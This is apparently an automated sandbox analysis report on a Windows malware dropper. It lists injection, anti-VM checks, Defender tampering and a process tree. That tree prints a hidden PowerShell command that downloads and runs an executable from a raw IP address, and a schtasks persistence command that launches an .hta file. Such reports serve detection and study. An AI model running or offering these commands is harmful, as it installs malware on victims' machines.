description pid Process procid_target PID 3400 set thread context of 1192 3400 Bjkm5hE.exe 124 PID 920 set thread context of 1632 920 7aencsM.exe 139 PID 5660 set thread context of 5704 5660 Ta3ZyUR.exe 161 PID 4668 set thread context of 5668 4668 7bf33bfbf1.exe 160 PID 6080 set thread context of 6120 6080 67c3b98f4d.exe 177 PID 2780 set thread context of 5308 2780 c55a0e6e0b.exe 181 PID 1784 set thread context of 1760 1784 con12312211221.exe 199 PID 5476 set thread context of 5312 5476 monthdragon.exe 229 PID 5748 set thread context of 468 5748 alex12112.exe 238 -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe File created C:\Windows\Tasks\pokxh.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\pokxh.job oVpNTUm.exe File created C:\Windows\Tasks\fmqsafh.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\fmqsafh.job oVpNTUm.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000b000000023d12-1329.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 1564 3400 WerFault.exe 123 3084 920 WerFault.exe 138 5764 5660 WerFault.exe 159 5424 5320 WerFault.exe 182 3788 1784 WerFault.exe 198 5296 5476 WerFault.exe 227 392 5748 WerFault.exe 237 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2a2c7885e3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9cf6487121.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9f63f4acb4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 075b5e47c5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 2ab110fa1b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce5fd68915.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 207737d668.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8ec90ad9b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9cf6487121.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9cf6487121.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e11c49ce9a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fmqsafh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pokxh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9ce8b15e02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67c3b98f4d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4fce678d37.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b56e837fb4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7bf33bfbf1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c8ec90ad9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c8ec90ad9b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 956 timeout.exe 2708 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 10 IoCs
pid Process 5596 taskkill.exe 4852 taskkill.exe 2052 taskkill.exe 432 taskkill.exe 1008 taskkill.exe 5528 taskkill.exe 4516 taskkill.exe 2860 taskkill.exe 2320 taskkill.exe 5148 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844186207773447" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5288 schtasks.exe 1452 schtasks.exe 2624 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 3016 skotes.exe 3016 skotes.exe 760 oVpNTUm.exe 760 oVpNTUm.exe 1348 3omTNLZ.exe 1348 3omTNLZ.exe 1348 3omTNLZ.exe 1348 3omTNLZ.exe 1348 3omTNLZ.exe 1348 3omTNLZ.exe 4464 powershell.exe 4464 powershell.exe 760 oVpNTUm.exe 760 oVpNTUm.exe 2524 powershell.exe 2524 powershell.exe 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 4480 pokxh.exe 4480 pokxh.exe 3604 powershell.exe 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 3604 powershell.exe 4032 9f63f4acb4.exe 4032 9f63f4acb4.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 2280 powershell.exe 2280 powershell.exe 712 9ce8b15e02.exe 712 9ce8b15e02.exe 4028 483d2fa8a0d53818306efeb32d3.exe 4028 483d2fa8a0d53818306efeb32d3.exe 1432 skotes.exe 1432 skotes.exe 1192 Bjkm5hE.exe 1192 Bjkm5hE.exe 1192 Bjkm5hE.exe 1192 Bjkm5hE.exe 4384 C3hYpvm.exe 3656 qFqSpAp.exe 3656 qFqSpAp.exe 3656 qFqSpAp.exe 3656 qFqSpAp.exe 5116 oVpNTUm.exe 5116 oVpNTUm.exe 2736 powershell.exe 2736 powershell.exe 4912 powershell.exe 4912 powershell.exe 4604 DTQCxXZ.exe 4604 DTQCxXZ.exe 4604 DTQCxXZ.exe 4604 DTQCxXZ.exe 5096 powershell.exe 5096 powershell.exe 1632 7aencsM.exe 1632 7aencsM.exe 900 3omTNLZ.exe 900 3omTNLZ.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 2524 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Token: SeDebugPrivilege 4364 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 4384 C3hYpvm.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeShutdownPrivilege 4468 chrome.exe Token: SeCreatePagefilePrivilege 4468 chrome.exe Token: SeDebugPrivilege 4824 207737d668.exe Token: SeDebugPrivilege 4516 taskkill.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 2320 taskkill.exe Token: SeDebugPrivilege 4852 taskkill.exe Token: SeDebugPrivilege 5596 taskkill.exe Token: SeDebugPrivilege 5720 powershell.exe Token: SeDebugPrivilege 2604 firefox.exe Token: SeDebugPrivilege 2604 firefox.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 1008 taskkill.exe Token: SeDebugPrivilege 5528 taskkill.exe Token: SeDebugPrivilege 5148 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 3936 ce5fd68915.exe 3936 ce5fd68915.exe 3936 ce5fd68915.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 4468 chrome.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 6096 msedge.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 1580 95e1feba6d.exe 1580 95e1feba6d.exe 1580 95e1feba6d.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3936 ce5fd68915.exe 3936 ce5fd68915.exe 3936 ce5fd68915.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 1580 95e1feba6d.exe 1580 95e1feba6d.exe 1580 95e1feba6d.exe 4604 2ab110fa1b.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 2604 firefox.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 4604 2ab110fa1b.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 3840 9cf6487121.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 3840 9cf6487121.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe 4320 firefox.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4384 C3hYpvm.exe 2604 firefox.exe 4320 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4844 wrote to memory of 3016 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 86 PID 4844 wrote to memory of 3016 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 86 PID 4844 wrote to memory of 3016 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 86 PID 3016 wrote to memory of 760 3016 skotes.exe 87 PID 3016 wrote to memory of 760 3016 skotes.exe 87 PID 3016 wrote to memory of 760 3016 skotes.exe 87 PID 3016 wrote to memory of 1348 3016 skotes.exe 88 PID 3016 wrote to memory of 1348 3016 skotes.exe 88 PID 3016 wrote to memory of 1348 3016 skotes.exe 88 PID 3016 wrote to memory of 3936 3016 skotes.exe 90 PID 3016 wrote to memory of 3936 3016 skotes.exe 90 PID 3016 wrote to memory of 3936 3016 skotes.exe 90 PID 3936 wrote to memory of 4364 3936 ce5fd68915.exe 91 PID 3936 wrote to memory of 4364 3936 ce5fd68915.exe 91 PID 3936 wrote to memory of 4364 3936 ce5fd68915.exe 91 PID 3936 wrote to memory of 3888 3936 ce5fd68915.exe 92 PID 3936 wrote to memory of 3888 3936 ce5fd68915.exe 92 PID 3936 wrote to memory of 3888 3936 ce5fd68915.exe 92 PID 4364 wrote to memory of 1452 4364 cmd.exe 94 PID 4364 wrote to memory of 1452 4364 cmd.exe 94 PID 4364 wrote to memory of 1452 4364 cmd.exe 94 PID 3888 wrote to memory of 4464 3888 mshta.exe 95 PID 3888 wrote to memory of 4464 3888 mshta.exe 95 PID 3888 wrote to memory of 4464 3888 mshta.exe 95 PID 3016 wrote to memory of 4384 3016 skotes.exe 97 PID 3016 wrote to memory of 4384 3016 skotes.exe 97 PID 3016 wrote to memory of 4384 3016 skotes.exe 97 PID 4384 wrote to memory of 3664 4384 cmd.exe 99 PID 4384 wrote to memory of 3664 4384 cmd.exe 99 PID 4384 wrote to memory of 3664 4384 cmd.exe 99 PID 3664 wrote to memory of 956 3664 cmd.exe 101 PID 3664 wrote to memory of 956 3664 cmd.exe 101 PID 3664 wrote to memory of 956 3664 cmd.exe 101 PID 3664 wrote to memory of 4968 3664 cmd.exe 102 PID 3664 wrote to memory of 4968 3664 cmd.exe 102 PID 3664 wrote to memory of 4968 3664 cmd.exe 102 PID 4968 wrote to memory of 2524 4968 cmd.exe 103 PID 4968 wrote to memory of 2524 4968 cmd.exe 103 PID 4968 wrote to memory of 2524 4968 cmd.exe 103 PID 4464 wrote to memory of 1880 4464 powershell.exe 104 PID 4464 wrote to memory of 1880 4464 powershell.exe 104 PID 4464 wrote to memory of 1880 4464 powershell.exe 104 PID 3664 wrote to memory of 2776 3664 cmd.exe 106 PID 3664 wrote to memory of 2776 3664 cmd.exe 106 PID 3664 wrote to memory of 2776 3664 cmd.exe 106 PID 2776 wrote to memory of 3604 2776 cmd.exe 107 PID 2776 wrote to memory of 3604 2776 cmd.exe 107 PID 2776 wrote to memory of 3604 2776 cmd.exe 107 PID 3016 wrote to memory of 4032 3016 skotes.exe 108 PID 3016 wrote to memory of 4032 3016 skotes.exe 108 PID 3016 wrote to memory of 4032 3016 skotes.exe 108 PID 3664 wrote to memory of 768 3664 cmd.exe 109 PID 3664 wrote to memory of 768 3664 cmd.exe 109 PID 3664 wrote to memory of 768 3664 cmd.exe 109 PID 768 wrote to memory of 4364 768 cmd.exe 110 PID 768 wrote to memory of 4364 768 cmd.exe 110 PID 768 wrote to memory of 4364 768 cmd.exe 110 PID 3664 wrote to memory of 2624 3664 cmd.exe 111 PID 3664 wrote to memory of 2624 3664 cmd.exe 111 PID 3664 wrote to memory of 2624 3664 cmd.exe 111 PID 3664 wrote to memory of 1716 3664 cmd.exe 112 PID 3664 wrote to memory of 1716 3664 cmd.exe 112 PID 3664 wrote to memory of 1716 3664 cmd.exe 112 PID 1716 wrote to memory of 2280 1716 mshta.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\1086705101\ce5fd68915.exe"C:\Users\Admin\AppData\Local\Temp\1086705101\ce5fd68915.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn q4bAAmaMrF0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn q4bAAmaMrF0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1452
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Users\Admin\AppData\Local\TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE"C:\Users\Admin\AppData\Local\TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word4⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
-
